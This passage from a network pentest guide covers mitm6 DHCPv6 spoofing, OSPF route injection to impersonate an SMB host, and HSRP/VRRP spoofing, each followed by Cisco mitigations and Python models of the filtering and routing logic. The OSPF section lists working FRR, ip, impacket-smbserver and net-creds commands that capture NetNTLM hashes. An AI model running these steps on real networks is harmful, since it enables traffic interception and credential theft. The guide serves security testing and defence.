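                              ALL_DHCP_RELAY_AGENTS_AND_SERVERS,
                              DHCPV6_CLIENT_PORT, DHCPV6_SERVER_PORT, 1)
ATTACKER_ADVERTISE = build_dhcpv6(ATTACKER_MAC, CLIENT_MAC, ATTACKER_LL, CLIENT_LL,
                                  DHCPV6_SERVER_PORT, DHCPV6_CLIENT_PORT, 2,
                                  dns_server_option(ATTACKER_LL))

if __name__ == "__main__":
    for name, frame, port in [("client SOLICIT", CLIENT_SOLICIT, "f0/7"),
                              ("mitm6 ADVERTISE", ATTACKER_ADVERTISE, "f0/3"),
                              ("ADVERTISE via uplink", ATTACKER_ADVERTISE, "g0/2")]:
        action, info = vacl_check(frame, port, TRUSTED_PORTS)
        print(f"{name:22s} on {port}: {action.upper():7s} {info['name']} "
              f"from {info['src_ip']} dns={info['dns']}")
```

The client's SOLICIT (546 to 547) is forwarded, so legitimate DHCPv6 keeps working; the attacker's ADVERTISE (547 to 546) is dropped on the user port but would pass on the trusted uplink, which is the trade-off the prose above mentions: a real DHCPv6 server or relay answering from inside the VLAN would be blocked too.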

With this attack, the attacker imposes his address as the address of a DNS server at the IPv6 level.

### Attack Impact

MITM

### Tools

[mitm6](https://github.com/dirkjanm/mitm6)

```bash
mitm6 -h
```

### Mitigations

RA Guard, filtering via VLAN access maps, disabling IPv6 on a Windows network when it is not in use

**Filtering via VLAN access map Example (Cisco IOS):**

The method is experimental; test it before rolling it out, because it also blocks any legitimate DHCPv6 server or relay that answers from inside the VLAN.

```
Monster(config)# ipv6 access-list MITM6
Monster(config-ipv6-acl)# permit udp any eq 547 any

Monster(config)# vlan access-map BLOCKMITM6 seq 10
Monster(config-vlan-map)# match ipv6 address MITM6
Monster(config-vlan-map)# action drop log
Monster(config)# vlan access-map BLOCKMITM6 seq 20
Monster(config-vlan-map)# action forward

Monster(config)# vlan filter BLOCKMITM6 vlan-list
```

The switch now drops DHCPv6 messages sent from `UDP/547` inside the VLAN, so the mitm6 ADVERTISE/REPLY never reaches the clients. This prevents an attacker from imposing himself as a DNS server at the IPv6 layer.

### Links

Article Link: https://blog.fox-it.com/2018/01/11/mitm6-compromising-ipv4-networks-via-ipv6/

# Network Layer Attacks (L3)

## Evil Twin against Dynamic Routing (OSPF)

### The problem of MITM attacks against dynamic routing

Performing a classic MITM attack against dynamic routing is **IMPOSSIBLE**: if you inject a route for a host on another segment and then try to forward the intercepted packets on to that host, they follow your own injected route straight back to you, creating a routing loop.
However, I have found an Evil Twin attack vector where you can **IMPERSONATE** the target host instead.

### Mechanics

The attacker uses the [FRRouting](https://frrouting.org/) software router to take part in the dynamic routing.

The main idea of the attack is to redistribute a static route with the lowest metric into the OSPF network, using OSPF as the vector for the false route injection. FRR can manage static routes and redistribute them, which frees me from the need to use standalone utilities (Loki, Scapy, etc.).

Suppose you want to spoof an SMB service at the address `10.1.1.33/32`: you configure such a route and spread it across the network via redistribution. In this example the target dynamic routing protocol is OSPF.

**Setting up OSPF: the attacker announces his own address into OSPF and specifies the area**

```
monster# configure terminal
monster(config)# router ospf
monster(config-router)# network 192.168.31.2/32 area 0.0.0.0
monster(config-router)# redistribute static metric 0
```

Another factor is the route cost. With FRR I redistribute the static route with a metric of zero; among routes to the same prefix, the lower the metric, the more preferable the route. And since I specify the `/32` mask during the injection, the chance that the injected route will be installed and used is very high.
This is because a router forwards each packet along the most specific matching route, the one with the longest mask: `10.1.1.33/32 via 192.168.31.2` beats the legitimate `/24` of the segment before metric or route type is even considered.

**Injection structure:**

```
monster(config)# ip route 10.1.1.33/32 ethX
```

Now I have to add a secondary address on the network interface equal to the address of the target SMB share, since the traffic will arrive at my host with destination IP `10.1.1.33`:

```bash
sudo ip addr add 10.1.1.33/32 dev ethX
```

Now all traffic intended for this SMB share will go to my host. After that, I can deploy a simple SMB server using [impacket](https://github.com/fortra/impacket) and intercept the NetNTLM challenge-responses (hashes, not cleartext passwords) that users' machines send when they authenticate; these can subsequently be cracked offline or relayed (NTLM Relay):

```bash
sudo impacket-smbserver -smb2support sharePath /home/caster/smb-share
~/toolkit/net-creds$ sudo python2 net-creds.py -i ethX
```

Exercise caution when you interfere with the routing process! The attack described above is extremely aggressive: when users go to the SMB share for their files, they won't find anything there. Since you're spoofing this share, you might be able to deploy a copy of it. You will collect enough hashes pretty soon, and then you can stop the attack. It's not recommended to drag out the exploitation; otherwise legitimate employees will become upset, and your covert pentest will no longer be a secret.

Thanks to the fast convergence of OSPF, once your injected route is withdrawn the routing tables quickly return to their initial (pre-attack) state, usually within a few seconds. However, it depends on the network size, since all routers must update their tables. Again, exercise caution!
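Before the withdrawal command, the route selection the injection relies on, as an added example that is not code from the MITMonster page or from FRRouting: a small model of a router's route selection with longest-prefix match first and, among routes to the same prefix, the OSPF preference order (intra-area over inter-area over external type 1 over external type 2, which is what `redistribute static` produces by default) before the metric. The topology, addresses and metrics are constructed. It shows something the prose only implies: redistributing the real `/24` with metric 0 would lose to the legitimate intra-area route, while the `/32` host route wins even with a huge metric, and withdrawing it restores the original path.

```python
# Added example: why the /32 host route wins. A tiny model of a router's route
# selection (RFC 2328 sec. 16.4 preference among OSPF route types, lowest cost
# within a type) with longest-prefix match applied first, as a real router does.
# Not code from MITMonster or FRRouting; the topology below is constructed.
from collections import namedtuple
from ipaddress import ip_address, ip_network

Route = namedtuple("Route", "network next_hop metric kind")

# Preference among routes to the *same* prefix: intra-area beats inter-area beats
# external type 1 beats external type 2, regardless of their metrics.
KIND_RANK = {"connected": 0, "ospf-intra": 1, "ospf-inter": 2, "ospf-e1": 3, "ospf-e2": 4}


class RoutingTable:
    def __init__(self):
        self.routes = []

    def add(self, prefix, next_hop, metric, kind):
        self.routes.append(Route(ip_network(prefix), next_hop, metric, kind))

    def withdraw(self, prefix, next_hop):
        """What the other routers see after 'no ip route ...' on the attacker's
        FRR box and the resulting LSA flush: the route simply disappears."""
        net = ip_network(prefix)
        self.routes = [r for r in self.routes
                       if not (r.network == net and r.next_hop == next_hop)]

    def lookup(self, dst):
        dst = ip_address(dst)
        candidates = [r for r in self.routes if dst in r.network]
        if not candidates:
            return None
        # 1. longest prefix, 2. route type preference, 3. lowest metric
        return min(candidates,
                   key=lambda r: (-r.network.prefixlen, KIND_RANK[r.kind], r.metric))


def build_table():
    """A core router's view before the attack (constructed topology)."""
    rt = RoutingTable()
    rt.add("10.0.0.0/24", "direct", 0, "connected")           # transit link between routers
    rt.add("10.1.1.0/24", "10.0.0.2", 20, "ospf-intra")       # the SMB server's real subnet
    rt.add("192.168.31.0/24", "10.0.0.3", 20, "ospf-intra")   # the segment the attacker sits in
    return rt


def inject(rt, prefix, attacker="192.168.31.2", metric=0, kind="ospf-e2"):
    """'ip route <prefix> ethX' plus 'redistribute static metric 0' as seen from
    the other routers: an external route with the attacker as next hop."""
    rt.add(prefix, attacker, metric, kind)


def next_hop_for(rt, dst):
    route = rt.lookup(dst)
    return route.next_hop if route else None


if __name__ == "__main__":
    rt = build_table()
    print("before attack        :", next_hop_for(rt, "10.1.1.33"))
    inject(rt, "10.1.1.0/24")         # same prefix as the real route: E2 loses to intra-area
    print("inject /24, metric 0 :", next_hop_for(rt, "10.1.1.33"))
    inject(rt, "10.1.1.33/32")        # host route: longest prefix, wins outright
    print("inject /32, metric 0 :", next_hop_for(rt, "10.1.1.33"))
    print("neighbour 10.1.1.34  :", next_hop_for(rt, "10.1.1.34"))
    rt.withdraw("10.1.1.33/32", "192.168.31.2")
    print("after withdrawal     :", next_hop_for(rt, "10.1.1.33"))
```

Only the one host address is hijacked; its neighbours in `10.1.1.0/24` keep their normal path, which is what makes the attack an impersonation of a single host rather than a segment-wide MITM.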

```
monster(config)# no ip route 10.1.1.33/32 ethX
```

### Attack Impact

Evil Twin

### Mitigations

Use passive interfaces and cryptographic authentication. This prevents an attacker on a user segment from forming an OSPF adjacency and introducing false routes.

**Passive Interfaces Configuration (Cisco IOS)**

A passive interface still has its subnet advertised, but sends no hellos and ignores the ones it receives, so no neighbor can come up on it. Make every interface facing end hosts passive:

```
Monster(config)# router ospf X
Monster(config-router)# passive-interface GigabitEthernet X/X
```

**OSPF Cryptographic Authentication (Cisco IOS)**

```
Monster(config)# interface GigabitEthernet X/X
Monster(config-if)# ip ospf authentication message-digest
Monster(config-if)# ip ospf message-digest-key <key-id> md5 <key>
```

MD5 is the classic option; newer IOS releases also support HMAC-SHA authentication via a key chain (`ip ospf authentication key-chain`, RFC 5709), which should be preferred where available.

### Links

Caster - [Nightmare Spoofing](https://hackmag.com/security/ospf-evil-twin/)

## First Hop Redundancy Spoofing

First Hop Redundancy Protocol (FHRP) is a class of protocols ensuring gateway redundancy. The idea is to combine multiple physical routers into one logical router with a common IP address. This virtual address is served by the interface of the master (in HSRP terms, active) router, which is responsible for traffic forwarding. The most popular protocols in the FHRP class are HSRP and VRRP.

The attack works by stealing the master role: the attacker injects FHRP packets with a higher priority value than the current master, takes over the virtual IP, and thus performs a MITM attack that wraps the traffic of the entire segment onto himself, a very audacious attack.

### Attack Impact

MITM

### Tools

[Loki](https://github.com/Raizo62/Loki_on_Kali)

### Mitigations

Authentication, highest priority.

Authentication prevents illegitimate routers from entering the redundancy process.
If an engineer intends to protect FHRP in this manner, a strong passphrase is required: the MD5 authentication is a keyed hash over the packet, so one captured packet lets an attacker brute-force a weak key offline.

**Example of MD5 authentication for HSRP:**

```
Monster(config-if)# standby X authentication md5 key-string <key>
```

**Example of MD5 authentication for VRRP:**

```
Monster(config-if)# vrrp X authentication md5 key-string <key>
```

For HSRP it is also recommended to set the maximum priority (255) on the active router, so that an attacker's packet with priority 255 no longer beats it outright. Note the limit of this measure: when priorities are equal, HSRP breaks the tie in favor of the higher IP address, so an attacker who picks a high address in the segment can still win the election. Priority alone is therefore a hardening step, not a substitute for authentication and filtering.

This does not work for VRRP at all, because the highest configurable priority is 254 (255 is reserved for the router that owns the virtual IP address). There it makes more sense to rely on authentication or even ACL-based filtering.

Example of setting the maximum priority for HSRP:

```
Monster(config)# int g0/0
Monster(config-if)# standby 1 priority 255
```